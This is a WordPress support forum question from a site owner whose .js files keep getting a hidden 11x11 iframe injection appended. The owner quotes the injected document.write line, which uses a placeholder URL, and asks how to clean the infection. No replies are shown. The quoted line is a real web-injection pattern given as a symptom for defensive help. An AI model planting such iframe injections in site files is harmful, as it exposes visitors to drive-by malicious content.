Support » Fixing WordPress » Hacked site. JS files constantly being modified

  • I have a couple WordPress installations on a server. 3/4 of them are constantly having all of their .js files modified, and getting a variation of the following line added at the end of the files:

    ;document.write('<iframe src="malicious_url_here" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>');

    I’ve gone through and upgraded all of my plugins, re-installed WordPress 3.4.2, and changed my passwords, but as soon as I delete the offending lines from the .js files, the modification comes back.

    How best can I remove this infection? What can I look for? My websites are showing up as serving malicious files.

    Thanks

Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Hacked site. JS files constantly being modified’ is closed to new replies.